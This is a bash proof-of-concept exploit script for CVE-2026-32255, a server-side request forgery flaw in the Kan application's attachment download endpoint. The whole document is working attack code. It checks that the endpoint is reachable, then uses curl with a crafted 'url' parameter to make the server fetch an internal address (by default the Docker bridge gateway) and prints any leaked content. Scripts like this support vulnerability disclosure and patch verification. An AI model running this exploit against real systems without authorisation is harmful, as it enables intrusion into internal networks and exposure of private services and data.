#!/usr/bin/env bash
#
# CVE-2026-32255 - Kan SSRF via Attachment Download
# Proof of Concept Exploit
#
# Usage: ./exploit.sh <target-url> [internal-url]
#

set -euo pipefail

TARGET="${1:-}"
DOCKER_GATEWAY=$(docker network inspect bridge --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}' 2>/dev/null || echo "172.17.0.1")
INTERNAL_URL="${2:-http://${DOCKER_GATEWAY}:8888}"
ENDPOINT="/api/download/attatchment"

if [ -z "$TARGET" ]; then
    echo "Usage: $0 <target-url> [internal-url]"
    echo ""
    echo "  target-url    Base URL of the Kan instance (e.g., http://localhost:3000)"
    echo "  internal-url  Internal URL to fetch via SSRF (default: http://<docker-bridge-ip>:8888)"
    exit 1
fi

# Strip trailing slash
TARGET="${TARGET%/}"

echo "=== CVE-2026-32255 - Kan SSRF via Attachment Download ==="
echo "Target: $TARGET"
echo "Internal URL: $INTERNAL_URL"
echo ""

# Step 1: Check if the endpoint is reachable
echo "[*] Checking if endpoint is reachable..."
STATUS=$(curl -s -o /dev/null -w "%{http_code}" "${TARGET}${ENDPOINT}" 2>/dev/null || true)

if [ "$STATUS" = "000" ]; then
    echo "[-] Could not connect to ${TARGET}"
    exit 1
fi

echo "[+] Endpoint is reachable (HTTP ${STATUS})"
echo ""

# Step 2: Attempt SSRF by requesting an internal resource
echo "[*] Attempting SSRF to ${INTERNAL_URL} ..."

RESPONSE=$(curl -s -w "\n%{http_code}" -G "${TARGET}${ENDPOINT}" --data-urlencode "url=${INTERNAL_URL}" 2>/dev/null || true)

HTTP_CODE=$(echo "$RESPONSE" | tail -n1)
BODY=$(echo "$RESPONSE" | sed '$d')

if [ "$HTTP_CODE" = "000" ]; then
    echo "[-] No response from server"
    exit 1
fi

if [ "$HTTP_CODE" = "403" ]; then
    echo "[+] NOT VULNERABLE - Server rejected the request (HTTP 403)"
    echo "    The URL validation is in place."
    exit 0
fi

if [ "$HTTP_CODE" = "500" ] || [ -z "$BODY" ]; then
    echo "[-] Server error or empty response (HTTP ${HTTP_CODE})"
    echo "    The endpoint may not be vulnerable, or the internal service is not running."
    exit 1
fi

# Step 3: A 200 response with a body means the server proxied the request (SSRF confirmed)
echo "[+] VULNERABLE - Server fetched internal resource (HTTP ${HTTP_CODE})"
echo ""
echo "Leaked content:"
echo "------------------------------------------------------------"
echo "$BODY"
echo "------------------------------------------------------------"